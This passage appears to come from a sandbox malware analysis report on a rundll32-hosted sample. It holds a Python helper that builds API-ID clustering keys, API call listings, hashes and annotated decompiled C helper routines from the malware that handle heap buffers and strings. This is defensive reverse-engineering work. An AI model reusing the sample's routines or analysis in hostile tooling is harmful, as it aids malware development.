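  • Part of subcall function 04F7C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 04F7C0EA
  • Part of subcall function 04F7C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04F6A645), ref: 04F7C0FE
  • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C131
  • Part of subcall function 04F7C01F: CloseHandle.KERNEL32(?), ref: 04F7C136
• HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04F80E2F
"""
SHUTDOWN_APIS = """
• SetEvent.KERNEL32(000002C0,00000001,04A15E70), ref: 04A17612
• SleepEx.KERNEL32(00000064,00000001), ref: 04A17621
• CloseHandle.KERNEL32(000002C0), ref: 04A17642
• HeapDestroy.KERNEL32(05140000), ref: 04A17652
"""


def api_names(listing: str) -> List[str]:
    """API names from the listing, sub-function calls included (the IDs count them)."""
    names = []
    for line in listing.splitlines():
        m = NAME_RE.match(line.strip().lstrip("•").strip())
        if m:
            names.append(m.group(1))
    return names


def tokens(name: str) -> List[str]:
    """Split an API name into the words the ID is built from."""
    base = re.sub(r"(?<=[a-z])(?:Ex|[AW])$", "", name)   # SleepEx -> Sleep, lstrlenW -> lstrlen
    parts = re.findall(r"[A-Z][a-z]*|[a-z]+", base)      # CamelCase words; CRT names stay whole
    return [p for p in parts if p not in STOP]


def api_id(listing: str) -> str:
    """Words grouped by occurrence count (most frequent first), '$' between groups,
    words inside a group sorted in ASCII order (uppercase before lowercase)."""
    counts = Counter(t for n in api_names(listing) for t in tokens(n))
    by_count: Dict[int, List[str]] = {}
    for tok, c in counts.items():
        by_count.setdefault(c, []).append(tok)
    return "$".join("".join(sorted(by_count[c])) for c in sorted(by_count, reverse=True))


if __name__ == "__main__":
    for label, listing in (("event", EVENT_APIS), ("pipe", PIPE_APIS),
                           ("process", PROCESS_APIS), ("shutdown", SHUTDOWN_APIS)):
        print(label, api_id(listing))
```

Because the key is built only from de-suffixed name fragments, two functions with the same set of calls in a different order, or with different arguments, collide on it; conversely a single extra CloseHandle changes the frequency grouping and therefore the whole string, so it is a coarse clustering key rather than a behavioural signature.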

                            APIs
                            • RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F80B35
                            • Sleep.KERNEL32(0000000A), ref: 04F80B3F
                            • HeapFree.KERNEL32(00000000), ref: 04F80B6D
                            • RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F80B82
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 8cf41a27fd562c95f9a50ecec676e79a1d7fb175a5c0585808075d357b403603
                            • Instruction ID: a02deca0fa6f25415ee3534e3de5aa55d3b008c69bc176094e5568e96924c834
                            • Opcode Fuzzy Hash: 8cf41a27fd562c95f9a50ecec676e79a1d7fb175a5c0585808075d357b403603
                            • Instruction Fuzzy Hash: 6DF03474A4064AAFE7089F14F84AF3937A0EF40304B01400DE802DF250EB3CFC06DA21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                             			E04A172C7() {
                             				/* Swaps the buffer stored at element 0 of the context block pointed to by
                             				   0x4a1a3cc, under the CRITICAL_SECTION at element 0x10 (byte offset 0x40),
                             				   after waiting for the field at element 0x16 (byte offset 0x58) to drop to
                             				   zero. The two unresolved __imp__ calls are RtlEnterCriticalSection
                             				   (ref 04A172D0) and RtlLeaveCriticalSection (ref 04A1731D) per the APIs
                             				   list below. */
                             				void* _v0;        /* presumably the replacement buffer; the decompiler could not attribute this slot */
                             				void** _t1;
                             				void** _t3;
                             				void** _t5;
                             				void** _t7;
                             				void** _t8;
                             				void* _t10;
                             
                             				_t3 =  *0x4a1a3cc; // 0x55395b0
                             				RtlEnterCriticalSection( &(_t3[0x10]));
                             				while(1) {
                             					_t5 =  *0x4a1a3cc; // 0x55395b0
                             					_t1 =  &(_t5[0x16]); // 0x0
                             					if( *_t1 == 0) {           /* field is zero: safe to swap */
                             						break;
                             					}
                             					Sleep(0xa);                /* poll every 10 ms while the lock is held */
                             				}
                             				_t7 =  *0x4a1a3cc; // 0x55395b0
                             				_t10 =  *_t7;
                             				if(_t10 != 0 && _t10 != 0x4a1b827) {
                             					/* 0x4a1b827 lies inside the mapped image (the 0x4A1A000 data region),
                             					   not on the heap, so that built-in buffer is never freed. */
                             					HeapFree( *0x4a1a2d8, 0, _t10);   /* 0x4a1a2d8: private heap, see E04A17607 */
                             					_t7 =  *0x4a1a3cc; // 0x55395b0
                             				}
                             				 *_t7 = _v0;                   /* install the replacement */
                             				_t8 =  &(_t7[0x10]);
                             				RtlLeaveCriticalSection(_t8);
                             				return _t8;
                             			}

                            APIs
                            • RtlEnterCriticalSection.NTDLL(05539570), ref: 04A172D0
                            • Sleep.KERNEL32(0000000A), ref: 04A172DA
                            • HeapFree.KERNEL32(00000000), ref: 04A17308
                            • RtlLeaveCriticalSection.NTDLL(05539570), ref: 04A1731D
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                             • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                             • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                            • String ID:
                            • API String ID: 58946197-0
                            • Opcode ID: 30b29fd7abb2937a76b4d805b95ced36bc2dd8c489273b00b637cf5cfd0b298e
                            • Instruction ID: 20a45d46eca605875443ca4b37f5d9f8873e91c4d03872c2e86b8c12feb5a1e3
                            • Opcode Fuzzy Hash: 30b29fd7abb2937a76b4d805b95ced36bc2dd8c489273b00b637cf5cfd0b298e
                            • Instruction Fuzzy Hash: C2F0D4B86012019BE7189B54E859B6A37B9EB64740B055019F902DB2B0C738FC02EA25
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F7095D
                            • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,04F6C1F8,00000000), ref: 04F709AB
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,04F81616,00000000,04F6C1F8,04F7E6A0,00000000,04F6C1F8,04F700C3,00000000,04F6C1F8,04F6306D,00000000), ref: 04F70CB6
                            • GetLastError.KERNEL32(?,00000000,?), ref: 04F70FB8
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseErrorFreeHandleHeapLastmemset
                            • String ID:
                            • API String ID: 2333114656-0
                            • Opcode ID: 1ef950f9789e9e0524a48de231ad5b4243d0d57bc6950c5fbc6b3efb60e4045e
                            • Instruction ID: d517e821d6976c176dfe727139df62cb51588d7b4a6390732664d1ed01e8c70c
                            • Opcode Fuzzy Hash: 1ef950f9789e9e0524a48de231ad5b4243d0d57bc6950c5fbc6b3efb60e4045e
                            • Instruction Fuzzy Hash: B5519632744219FEEB117E74EC41FEB3668EF45354F108067F905A6180EEBCB953AA62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F763D1: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?), ref: 04F763F5
                              • Part of subcall function 04F763D1: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 04F76407
                              • Part of subcall function 04F763D1: wcstombs.NTDLL ref: 04F76415
                              • Part of subcall function 04F763D1: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?), ref: 04F76439
                              • Part of subcall function 04F763D1: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 04F7644E
                              • Part of subcall function 04F763D1: mbstowcs.NTDLL ref: 04F7645B
                              • Part of subcall function 04F763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F7646D
                              • Part of subcall function 04F763D1: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,04F6A7C4,?,?,?,?,?), ref: 04F76487
                            • GetLastError.KERNEL32 ref: 04F6A82D
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C58
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C7C
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,04F617D6,?,?,?,?,?,?,?), ref: 04F73C8A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6A849
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6A85A
                            • SetLastError.KERNEL32(00000000), ref: 04F6A85D
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                            • String ID:
                            • API String ID: 3867366388-0
                            • Opcode ID: b7a9d967e9a33bed0f14cf56146396fd51a85f5ab6bcbe4d0689db0154cc3890
                            • Instruction ID: dcd89fb8a32c0d8dcd0a6542bb64e74b0b2c432cabea38fc14b2521761550b79
                            • Opcode Fuzzy Hash: b7a9d967e9a33bed0f14cf56146396fd51a85f5ab6bcbe4d0689db0154cc3890
                            • Instruction Fuzzy Hash: 53312C31D00108FFCF029FA9DC4489EBFB5FF49714B10415AF926A6121D7759A52EF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7D698: lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D6F2
                              • Part of subcall function 04F7D698: lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D710
                              • Part of subcall function 04F7D698: RtlAllocateHeap.NTDLL(00000000,761B6985,?), ref: 04F7D73C
                              • Part of subcall function 04F7D698: memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D753
                              • Part of subcall function 04F7D698: HeapFree.KERNEL32(00000000,00000000), ref: 04F7D766
                              • Part of subcall function 04F7D698: memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,04F61785,?,?,?,?,?), ref: 04F7D775
                            • GetLastError.KERNEL32 ref: 04F617EE
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C58
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 04F73C7C
                              • Part of subcall function 04F73BAA: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,04F617D6,?,?,?,?,?,?,?), ref: 04F73C8A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6180A
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6181B
                            • SetLastError.KERNEL32(00000000), ref: 04F6181E
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                            • String ID:
                            • API String ID: 2451549186-0
                            • Opcode ID: b54013889cf22dcb9081b3669b98c6c302880eebc922ca90d1ed05f2af8cdb12
                            • Instruction ID: 32cf48a19edc0abbeb26ded4ca74ac137c090b4609d5f68bd2be6f4cf7240b48
                            • Opcode Fuzzy Hash: b54013889cf22dcb9081b3669b98c6c302880eebc922ca90d1ed05f2af8cdb12
                            • Instruction Fuzzy Hash: C9311832D00108BFCF129FA9DD40CAEBFB5FF48724B10415AF916A6121D735AA62EF90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 0c9a7a53eee5391e6b6a3e98c6eed160d4185ad33920cff06194bfe443eb68e7
                            • Instruction ID: 439029550477c20c992535bd7bff7b56824b3f912104bec5247c4251a7a7c0c7
                            • Opcode Fuzzy Hash: 0c9a7a53eee5391e6b6a3e98c6eed160d4185ad33920cff06194bfe443eb68e7
                            • Instruction Fuzzy Hash: 9C2181B6901919BBDB216FA0DC84966BBA9FF093087140119E94786C50D732F4B3DFE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000), ref: 04F6D435
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                              • Part of subcall function 04F82DE3: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04F6D463,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000), ref: 04F82DF1
                              • Part of subcall function 04F82DE3: StrChrA.SHLWAPI(?,0000003F,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?), ref: 04F82DFB
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?), ref: 04F6D493
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4A3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4AF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: b8e97563c5c90a10bc57b5cf6fc0950ea87b435109748456037ab2de5cce7abe
                            • Instruction ID: 43b5d6596157712597356f8f98f38a6a82cee25ed8b8d86fd3fae9957a72ebfb
                            • Opcode Fuzzy Hash: b8e97563c5c90a10bc57b5cf6fc0950ea87b435109748456037ab2de5cce7abe
                            • Instruction Fuzzy Hash: B8217272A04255BBDB12AF64CC84AAF7FA8DF06294B058055FC069F201EB75FD02D7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E04A145C4(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                            				intOrPtr* _v8;
                            				void* _t2;
                            				void* _t17;
                            				intOrPtr* _t22;
                            				intOrPtr* _t26;
                            				void* _t27;
                            				void* _t28;
                            				char* _t30;
                            				void* _t33;
                            				void* _t34;
                            				void* _t36;
                            				void* _t37;
                            				void* _t39;
                            				int _t42;
                            
                            				/* Decompiler output (quality 58%). The three unresolved __imp__ calls are
                            				   lstrlen (ref 04A145D0) and lstrcpy (refs 04A1463E, 04A1464A) per the APIs list below. */
                            				_t17 = __eax;
                            				_t37 = 0;
                            				__imp__(_a4, _t33, _t36, _t27, __ecx); /* lstrlen(_a4): length of the input string */
                            				_t2 = _t17 + 1; // 0x1
                            				_t28 = _t2;
                            				_t34 = E04A16D63(_t2); /* heap-allocate length + 1 bytes for the first part (RtlAllocateHeap in the subcall) */
                            				if(_t34 != 0) {
                            					_t30 = E04A16D63(_t28); /* second buffer of the same size */
                            					if(_t30 == 0) {
                            						E04A16C2C(_t34); /* second allocation failed: release the first buffer */
                            					} else {
                            						_t39 = _a4;
                            						_t22 = E04A17A57(_t39); /* locate the separator ('/' or '?', via StrChrA in the subcall) */
                            						_v8 = _t22;
                            						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                            							_a4 = _t39;
                            						} else {
                            							/* doubled separator (e.g. "//"): skip both characters and search again */
                            							_t26 = _t22 + 2;
                            							_a4 = _t22 + 2;
                            							_t22 = E04A17A57(_t26);
                            							_v8 = _t22;
                            						}
                            						if(_t22 == 0) {
                            							/* no separator: whole string into the first buffer, second buffer becomes "/" */
                            							__imp__(_t34, _a4); /* lstrcpy(_t34, _a4) */
                            							 *_t30 = 0x2f;
                            							 *((char*)(_t30 + 1)) = 0;
                            						} else {
                            							/* split at the separator: prefix into the first buffer, remainder into the second */
                            							_t42 = _t22 - _a4;
                            							memcpy(_t34, _a4, _t42);
                            							 *((char*)(_t34 + _t42)) = 0;
                            							__imp__(_t30, _v8); /* lstrcpy(_t30, _v8) */
                            						}
                            						 *_a8 = _t34;
                            						_t37 = 1;
                            						 *_a12 = _t30;
                            					}
                            				}
                            				return _t37;
                            			}

                            APIs
                            • lstrlen.KERNEL32(00000000,00000008,?,761B4D40,?,?,04A16973,?,?,?,?,00000102,04A137A0,?,?,761F81D0), ref: 04A145D0
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                              • Part of subcall function 04A17A57: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04A145FE,00000000,00000001,00000001,?,?,04A16973,?,?,?,?,00000102), ref: 04A17A65
                              • Part of subcall function 04A17A57: StrChrA.SHLWAPI(?,0000003F,?,?,04A16973,?,?,?,?,00000102,04A137A0,?,?,761F81D0,00000000), ref: 04A17A6F
                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04A16973,?,?,?,?,00000102,04A137A0,?), ref: 04A1462E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04A1463E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04A1464A
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                            • String ID:
                            • API String ID: 3767559652-0
                            • Opcode ID: ccd2c088b5ec3d76f92e47113fef6355e43ac98f4ca068eb1dc2a165b73e0976
                            • Instruction ID: 86b1062ef2aefa179dbf7563a58ba0f27bca38a73f9c61d7bccd984970abf7d9
                            • Opcode Fuzzy Hash: ccd2c088b5ec3d76f92e47113fef6355e43ac98f4ca068eb1dc2a165b73e0976
                            • Instruction Fuzzy Hash: 3321E4B6500255FBDB12AF78C884EAB7FBCEF49788F054055F8059B221E735EA01CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                            • Instruction ID: ef4dd1e6857af7fcac4669f9688db594bd69aa9f537ee9dfb9e4cd0e6fad5ddc
                            • Opcode Fuzzy Hash: 675587d73748d83cb1657c9497af44e6ba026aede7eedd5967ca4f42d02b1d89
                            • Instruction Fuzzy Hash: 3D119E76901919BBDB209FA0EC84A66B778FF09304B05011AEA4992C10D776B9B3DBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A128C4(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                            				void* _v8;
                            				int _t10;
                            				void* _t18;
                            				int _t25;
                            				int _t29;
                            				int _t34;
                            
                            				/* Concatenates two wide strings into a freshly heap-allocated buffer (RtlAllocateHeap in the subcall). */
                            				_t29 = lstrlenW(_a4); /* length of the first string, in characters */
                            				_t25 = lstrlenW(_a8); /* length of the second string, in characters */
                            				_t18 = E04A16D63(_t25 + _t29 + _t25 + _t29 + 2); /* 2 * (len1 + len2) + 2 bytes: both strings plus the WCHAR terminator */
                            				_v8 = _t18;
                            				if(_t18 != 0) {
                            					_t34 = _t29 + _t29; /* byte length of the first string */
                            					memcpy(_t18, _a4, _t34);
                            					_t10 = _t25 + 2; // 0x2
                            					memcpy(_v8 + _t34, _a8, _t25 + _t10); /* second string plus its terminator: 2 * len2 + 2 bytes */
                            				}
                            				return _v8;
                            			}

                            APIs
                            • lstrlenW.KERNEL32(004F0053,?,761B5520,00000008,055393F4,?,04A121EB,004F0053,055393F4,?,?,?,?,?,?,04A166BE), ref: 04A128D4
                            • lstrlenW.KERNEL32(04A121EB,?,04A121EB,004F0053,055393F4,?,?,?,?,?,?,04A166BE), ref: 04A128DB
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • memcpy.NTDLL(00000000,004F0053,761B69A0,?,?,04A121EB,004F0053,055393F4,?,?,?,?,?,?,04A166BE), ref: 04A128FB
                            • memcpy.NTDLL(761B69A0,04A121EB,00000002,00000000,004F0053,761B69A0,?,?,04A121EB,004F0053,055393F4), ref: 04A1290E
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlenmemcpy$AllocateHeap
                            • String ID:
                            • API String ID: 2411391700-0
                            • Opcode ID: 21b454ea64dfb8820888d0b0b7be1fd9741b2c089f3322f9b03c527a21153719
                            • Instruction ID: 2f5a90166e3052b1770de71c3d71518f7f5e0287f58bfeb8e85a47aa3a27e30e
                            • Opcode Fuzzy Hash: 21b454ea64dfb8820888d0b0b7be1fd9741b2c089f3322f9b03c527a21153719
                            • Instruction Fuzzy Hash: 33F0F976900119BBAF11EFA9CC84CDF7BACEF092987154062ED04D7211EA75EB15DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(69B25F44,?,?,00000000,04F75F22,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04F781A4
                            • lstrlen.KERNEL32(?,?,?,?), ref: 04F781A9
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 04F781C5
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F781E3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                            • String ID:
                            • API String ID: 1697500751-0
                            • Opcode ID: e9d806c0920707854dc0cb095144619eda020cea098ff6296173e4f09f13b5c1
                            • Instruction ID: b6d8f43a11f7af318391cbc20044496e3710fa49133290bb0432ea5c3b44b5a5
                            • Opcode Fuzzy Hash: e9d806c0920707854dc0cb095144619eda020cea098ff6296173e4f09f13b5c1
                            • Instruction Fuzzy Hash: 1DF0F6B7900751BBD721AA6A9C4CF1B7F9CFFC4391B094426E90587101E779E405CBB1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(06318560,761B5520,761F81D0,7749EEF0,04F6E873,?), ref: 04F68DD7
                            • lstrlen.KERNEL32(?), ref: 04F68DDF
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000,06318560), ref: 04F68DF3
                            • lstrcat.KERNEL32(00000000,?), ref: 04F68DFE
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 086dc45b2d4a6d652e69c3bfb11d64b42c97bbcd8ceaf4dea5b58c10c2ffdf9f
                            • Instruction ID: ef85648cc84892c9000b94f3396833a409578ce1473a83fa951395fadf4b0d21
                            • Opcode Fuzzy Hash: 086dc45b2d4a6d652e69c3bfb11d64b42c97bbcd8ceaf4dea5b58c10c2ffdf9f
                            • Instruction Fuzzy Hash: B9E09273901225AB87119FE8BC4CCAFBBACEF99654304081AF600DB100C7299C018BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(05539B68,00000000,00000000,00000000,04A15902,00000000), ref: 04A1394C
                            • lstrlen.KERNEL32(?), ref: 04A13954
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • lstrcpy.KERNEL32(00000000,05539B68), ref: 04A13968
                            • lstrcat.KERNEL32(00000000,?), ref: 04A13973
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                            • String ID:
                            • API String ID: 74227042-0
                            • Opcode ID: 9bb669b9d61aa9fc99a2cf1c513b4270f984423d2a3e55e6a85fe6dada569ebb
                            • Instruction ID: 461c3b6ad6396baf22d046bfd7267e12898554ddeda1f7390820a14808c2385c
                            • Opcode Fuzzy Hash: 9bb669b9d61aa9fc99a2cf1c513b4270f984423d2a3e55e6a85fe6dada569ebb
                            • Instruction Fuzzy Hash: D5E0D8779016206B97119FF4AC4CC9FBBBCEF997617050416FA40D3120C7299D02CBE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000018.00000003.355421404.000002B636410000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002B636410000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_24_3_2b636410000_mshta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction ID: 272eba2218f925e95bd574ba5da1c1936239a68be2d0dd5740ed0d5ce09e05dc
                            • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                            • Instruction Fuzzy Hash: F390020589940655D55416920C4E25C61816388A90FD484C0D42690145D98D02A61256
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            Strings
                            Memory Dump Source
